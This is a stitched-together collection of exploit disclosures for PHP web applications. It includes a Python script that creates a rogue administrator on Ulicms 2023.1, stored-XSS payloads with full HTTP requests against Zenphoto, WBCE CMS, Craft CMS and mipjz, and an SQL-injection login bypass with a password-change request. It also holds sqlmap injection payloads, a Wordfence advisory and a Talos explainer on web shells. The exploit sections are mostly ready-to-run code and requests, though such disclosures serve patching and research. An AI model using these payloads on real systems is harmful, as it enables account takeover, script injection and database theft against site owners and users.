Ulicms version 2023.1 create administrator user via mass assignment exploit.

    #Exploit Title: Ulicms 2023.1 - create admin user via mass assignment#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:   create admin user via mass assignment#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicunaimport requestsnew_name=input("name: ")new_email=input("email: ")new_pass=input("password: ")url = "http://localhost/dist/admin/index.php"headers = {"Content-Type": "application/x-www-form-urlencoded"}data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="response = requests.post(url, headers=headers, data=data)if response.status_code == 200:    print("Request is success and created new admin account")    else:    print("Request is failure.!!")        #POC video : https://youtu.be/SCkRJzJ0FVk

Ulicms 2023.1 Create Administrator

Zenphoto version 1.6 suffers from multiple persistent cross site scripting vulnerabilities.

    Exploit Title: Zenphoto 1.6 - Multiple stored XSSApplication: Zenphoto-1.6 xss pocVersion: 1.6 Bugs:  XSSTechnology: PHPVendor URL: https://www.zenphoto.org/news/zenphoto-1.6/Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zipDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. create new album 2. write Album Description : <iframe src="https://14.rs"></iframe> 3. save and view album  http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/=====================================================###XSS-2###steps: 1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)2.change postal code  as <script>alert(4)</script>3.if admin user information import as html , xss will triggerpoc video : https://youtu.be/JKdC980ZbLY

Zenphoto 1.6 Cross Site Scripting

WBCE CMS version 1.6.1 suffers from a cross site scripting vulnerability.

    Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)Version: 1.6.1Bugs:  XSSTechnology: PHPVendor URL: https://wbce-cms.org/Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1Date of found: 03-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1Host: localhostContent-Length: 976sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-platform: "Linux"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtOAccept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167Connection: close------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="reqid"187de34ea92ac------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="cmd"upload------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="target"l1_Lw------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="mtime[]"1683056102------WebKitFormBoundary5u4r3pOGl4EnuBtO--3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)========================================================================================================================###XSS-2###1. go to pages  (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)2. add page3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3Epoc request:POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1Host: localhostContent-Length: 143Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475Connection: closepage_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

WBCE CMS 1.6.1 Cross Site Scripting

### Summary
XSS can be triggered by review volumes

### PoC

    1. Access setting tab
    2. Create new assets
    3. In assets name inject payload: "<script>alert(1337)</script>
    4. Click Utilities tab
    5. Choose all volumes, or volume trigger xss
    6. Click Update asset indexes.
    7. Wait to assets update success.
    8. Progress complete.
    9. Click on review button will trigger XSS

### Root cause
Function: index.php?p=admin/actions/asset-indexes/process-indexing-session&v=1680710595770
After loading completed, progess will load: 
"skippedEntries"
and
"missingEntries"
These parameters is not yet filtered, I just tried "skippedEntries" but I think it will be work with "missingEntries"

### My reponse:
{
  "session": {
    "id": 10,
    "indexedVolumes": {
      "6": "\"<script>alert(1337)</script>"
    },
    "totalEntries": 2235,
    "processedEntries": 2235,
    "cacheRemoteImages": true,
    "listEmptyFolders": false,
    "isCli": false,
    "actionRequired": true,
    "dateCreated": "Apr 5, 2023, 9:03:16 AM",
    "skippedEntries": [
      "\"<script>alert(1337)</script>/assetpreviews/Image.php",
      "\"<script>alert(1337)</script>/assetpreviews/Pdf.php"
    ],
    "missingEntries": {
      "folders": [],
      "files": []
    },
    "processIfRootEmpty": false
  },
  "skipDialog": false
}



Resolved in https://github.com/craftcms/cms/commit/053d7119697e480ff81c5723bb9a33eaa49e0fc7

**Summary**

XSS can be triggered by review volumes

**PoC**

    1. Access setting tab
    2. Create new assets
    3. In assets name inject payload: "<script>alert(1337)</script>
    4. Click Utilities tab
    5. Choose all volumes, or volume trigger xss
    6. Click Update asset indexes.
    7. Wait to assets update success.
    8. Progress complete.
    9. Click on review button will trigger XSS
    

**Root cause**

Function: index.php?p=admin/actions/asset-indexes/process-indexing-session&v=1680710595770  
After loading completed, progess will load:  
"skippedEntries"  
and  
"missingEntries"  
These parameters is not yet filtered, I just tried "skippedEntries" but I think it will be work with "missingEntries"

**My reponse:**

{  
"session": {  
"id": 10,  
"indexedVolumes": {  
"6": ""<script>alert(1337)</script>"  
},  
"totalEntries": 2235,  
"processedEntries": 2235,  
"cacheRemoteImages": true,  
"listEmptyFolders": false,  
"isCli": false,  
"actionRequired": true,  
"dateCreated": "Apr 5, 2023, 9:03:16 AM",  
"skippedEntries": \[  
""<script>alert(1337)</script>/assetpreviews/Image.php",  
""<script>alert(1337)</script>/assetpreviews/Pdf.php"  
\],  
"missingEntries": {  
"folders": \[\],  
"files": \[\]  
},  
"processIfRootEmpty": false  
},  
"skipDialog": false  
}

Resolved in craftcms/cms@053d711

**References**

*   GHSA-cjmm-x9x9-m2w5
*   https://github.com/craftcms/cms/releases/tag/4.4.7

GHSA-cjmm-x9x9-m2w5: Craft CMS stored XSS in review volume

What are web shells? And why are attackers increasingly using them in their campaigns? We break it down in this blog.

Friday, May 26, 2023 08:05

_Editor's note: The Need to Know is a new series from Talos, which focuses on cybersecurity terms, threats, tools and tactics that are discussed in our broader threat research. Think of this as a living encyclopedia of security terms and trends._

Cisco Talos Incident Response recently released our 2023 Q1 Incident Response Quarterly Trends report. One of the most noteworthy trends was the prolific use of web shells in cyberattacks.

In fact, not only were web shells the most observed threat overall, but they also appeared in almost a quarter of all incidents. That’s a marked increased from our previous trends report (the usage growing from 6% to 25%).

You may be wondering, why is that? Or maybe, what are web shells? And why do attackers use them in their campaigns? Let’s break it down:

**What are web shells?**

A web shell is a tool that bad actors may use to interact with and maintain access to a system, after an initial compromise\[M(1\] . It takes the form of a web script (a piece of code) which is then uploaded to a vulnerable system. Afterwards, it can be used to interact with the underlying operating system.

The complexity of modern systems, especially websites that may include third-party software or libraries (that, in turn, make many outbound connections), means that malicious scripts that threat actors use for initial access, are easily missed.

After that initial access, malicious web scripts can leverage exploitation techniques, or are used to carry out further attacks.

**How are web shells typically used in attacks?**

Attackers will look for vulnerabilities within a system to find the best place (as far as they are concerned) to drop a web shell (or in many cases, multiple shells). Those vulnerabilities might be in a website content management system or an unpatched web server, for example.

The point of this is to establish a foothold to gain persistent access to a system. Imagine you’ve built a secret door that no one else knows about – you have the key, so you can return as often as you like.

Adversaries then have several options in front of them, depending on their ultimate motivation. We’ve seen them remotely execute arbitrary code or commands, as well as move laterally within the network, or deliver additional malicious payloads.

As noted in the Talos Q1 2023 Incident Response report, exploitation of public-facing applications was the top observed initial access technique, with the increased web shell activity likely contributing to this significant observation.

**Notable example: China Chopper**

China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application, which contains all the information required to control the target.

In 2019, due to its significant use over the previous two years (including espionage campaigns), two Talos researchers took a closer look at the China Chopper web shell. They explored several cases studies where China Chopper was used.

**How can you detect web shells?**

A web shell will often leave sticky fingerprints at the scene. An intrusion prevention system such as Snort can help detect if an attacker has used a tool like a web shell to gain remote access.

Cisco Secure Network Analytics can help uncover rogue connections, as can Cisco Umbrella by blocking malicious connections at the DNS level.

Organizations should deploy endpoint detection and response tools such as Cisco Secure Endpoint, which gives users the ability to track process invocation and inspect processes.

**Prevention recommendations**

The increase in web shell engagements highlights the need for more awareness and protections in helping to prevent web shells. Talos provides the following recommendations:

· Routinely update and patch all software and operating systems to identify and remediate vulnerabilities or misconfigurations in web applications and web servers.

· In addition to patching, perform general system hardening, including removing services or protocols where they are unnecessary and being aware of all systems exposed directly to the internet.

· Disable unnecessary php functions in your “php.ini”, such as eval(), exec(), peopen(), proc\_open() and passthru().

· Frequently audit and review logs from web servers for unusual or anomalous activity.

Read the full 2023 Q1 Talos Incident Response Quarterly Trends report\[MOU2\]

What is a web shell?

A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter at /app/tag/controller/ApiAdminTagCategory.php.

\[Vulnerability Description\]  
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the tag category name field from categoryAdd.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/sansanyun/mipjz  
http://www.mipjz.com/

\[Affected Product Code Base\]  
v5.0.5

\[Vulnerability Proof\]

1.  Check the code and find that /app/tag/controller/ApiAdminTagCategory.php does not check and filter the name parameter input by the user

2.  Add a tag category, insert the js code at the name parameter: xss

    POST /index.php?s=/tag/ApiAdminTagCategory/categoryAdd HTTP/1.1
    Host: 192.168.11.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    dataId: 
    Content-Length: 286
    Origin: http://192.168.11.102
    Connection: close
    Referer: http://192.168.11.102/index.php?s=/admin/
    Cookie: jERzUAUdppHHnews=2%2C1; jERzUAUdppHHproduct=1%2C3; csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
    
    {"pid":0,"name":"xss<img src onerror=alert(1)>","url_name":"aaa","seo_title":"","template":"tag.html","detail_template":"tagDetail.html","category_url":"/tag/<url_name>/","category_page_url":"<category_url>index_<page>.html","detail_url":"/tag/<id>.html","description":"","keywords":""}
    

3.  Delete the label category created in the previous step, and any code will be executed in the pop-up prompt box

CVE-2023-33751: There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 · Issue #14 · sansanyun/mipjz

A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description parameter at /index.php?s=/article/ApiAdminArticle/itemAdd.

\[Vulnerability Description\]  
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/sansanyun/mipjz  
http://www.mipjz.com/

\[Affected Product Code Base\]  
v5.0.5

\[Vulnerability Proof\]

1.  Add an article, insert js code in the description parameter: xss

    POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
    Host: 192.168.11.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    dataId: 
    Content-Length: 426
    Origin: http://192.168.11.102
    Connection: close
    Referer: http://192.168.11.102/index.php?s=/admin/
    Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
    
    {"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}
    

2.  Visit the article page, the code is loaded and executed

\[Code Details\]

1.  Add an article, receive parameters, and pass it to \\app\\article\\model\\Articles.php:itemAdd for processing

2.  \\app\\article\\model\\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

3.  Article Details \\app\\article\\controller\\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

4.  In the "guess you like" area in the article display \\template\\default\\article\\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

CVE-2023-33750: There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 · Issue #15 · sansanyun/mipjz

WordPress Beautiful Cookie Consent Banner versions 2.10.1 and below suffer from an unauthenticated persistent cross site scripting vulnerability.

    Description: Beautiful Cookie Consent Banner <= 2.10.1 - Unauthenticated Stored Cross-Site Scripting Affected Plugin:Beautiful Cookie Consent BannerPlugin Slug: beautiful-and-responsive-cookie-consentAffected Versions: <= 2.10.1CVE ID: Not AssignedCVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:NResearcher/s: UnknownFully Patched Version: 2.10.2The Beautiful Cookie Consent Banner for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nsc_bar_content_href' parameter in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A partial patch was made available in 2.10.1 and the issue was fully patched in 2.10.2.The AttacksAccording to our records, the vulnerability has been actively attacked since February 5, 2023, but this is the largest attack against it that we have seen. We have blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing.Cookie consent attacks chart Pictured: A chart showing sites attacked and total attacks targeting this vulnerabilityWe believe that this is the work of a single actor, as every single attack contained a partial payload of onmouseenter=" and no further functioning JavaScript. It is likely that this set of attacks is being performed using a misconfigured exploit that expects a customized payload, and that the attacker has simply failed to provide one.Despite this fact, if your website is running a vulnerable version of the plugin and you are not currently using Wordfence or another Web Application Firewall, these attacks do have the potential to corrupt the configuration of the plugin which can break its intended functionality, so we still recommend updating to the latest version, which is 2.13.0 at the time of this writing, as soon as possible.Indicators of CompromiseRequestsexample request An example request showing the payload being usedPOST requests to /wp-admin/admin-post.php from unrecognized IP addresses may appear in your server logs, or in your Live Traffic if you have the Wordfence plugin installed.IP AddressesWe have included the top 20 attacking IP addresses, though there are many more:- 209.126.12.142- 101.34.223.139- 92.204.37.157- 66.37.4.138- 92.205.48.232- 212.237.233.32- 195.201.82.166- 67.205.58.212- 51.38.27.102- 173.236.213.148- 207.244.241.230- 74.208.177.185- 92.204.33.117- 134.119.0.186- 5.9.238.21- 92.205.64.149- 94.158.149.174- 173.236.215.161- 92.205.48.177- 190.54.62.76If your site was impacted by this or an earlier attack campaign, it may have corrupted the ​​nsc_bar_bannersettings_json option in your database. The plugin's developers have included functionality in patched versions to repair any changes made as a result of this exploit.ConclusionIn today’s article, we covered an uptick in attacks targeting a patched vulnerability in Beautiful Cookie Consent Banner.All Wordfence sites, including those running Wordfence Free, Wordfence Premium, Wordfence Care, and Wordfence Response, are protected against this vulnerability by the Wordfence Firewall’s Built-in Cross-Site Scripting protection.However, if you have friends or colleagues running this plugin, please forward this advisory to them - while the current wave of attacks does not contain a malicious payload, the attacker behind this is targeting a large list of sites and has significant resources available to them, and it would be simple for them to update their exploit configuration with a viable malicious payload.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard.

WordPress Beautiful Cookie Consent Banner 2.10.1 Cross Site Scripting

2023 Online Course Registration version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing## Author: nu11secur1ty## Date: 05.25.2023## Vendor: https://github.com/nikhilkeshava## Software: https://github.com/nikhilkeshava/online-course-registration-## Reference: https://portswigger.net/web-security/sql-injection,https://portswigger.net/web-security/sql-injection/lab-login-bypass## Description:The `username` parameter appears to be vulnerable to SQL injectionattacks. The payloads 77834251' or 6127=6127-- and 98762777' or4535=4542-- were each submitted in the username parameter. These tworequests resulted in different responses, indicating that the input isunsafely incorporated into a SQL query. The attacker can use thisbypass login vulnerability to send a remote POST request to set a newadministrator password for himself, which is absolutely nasty.STATUS: HIGH Vulnerability[+]Payload:```POSTPOST /online-course-registration/admin/index.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 62Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeusername=nu11secur1ty%27+or+1%3D1%23&password=password&submit=```[+]Exploit:```POSTPOST /online-course-registration/admin/change-password.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 58Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/change-password.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closecpass=password&newpass=password5&cnfpass=password5&submit=```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)## Time spend:01:15:00

2023 Online Course Registration 1.0 SQL Injection

Service Provider Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Service Provider Management System v1.0 - SQL Injection# Date: 2023-05-23# Exploit Author: Ashik Kunjumon# Vendor Homepage: https://www.sourcecodester.com/users/lewa# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html# Version: 1.0# Tested on: Windows/Linux1. Description:Service Provider Management System v1.0 allows SQL Injection via IDparameter in /php-spms/?page=services/view&id=2Exploiting this issue could allow an attacker to compromise theapplication, access or modify data,or exploit the latest vulnerabilities in the underlying database.Endpoint: /php-spms/?page=services/view&id=2Vulnerable parameter: id (GET)2. Proof of Concept:----------------------Step 1 - By visiting the url:http://localhost/php-spms/?page=services/view&id=2 just add single quote toverify the SQL Injection.Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"-p id --dbms=mysqlSQLMap Response:----------------------Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECTCOUNT(*),CONCAT(0x7178717171,(SELECT(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=services/view&id=1' AND (SELECT 1072 FROM(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

Tag

#php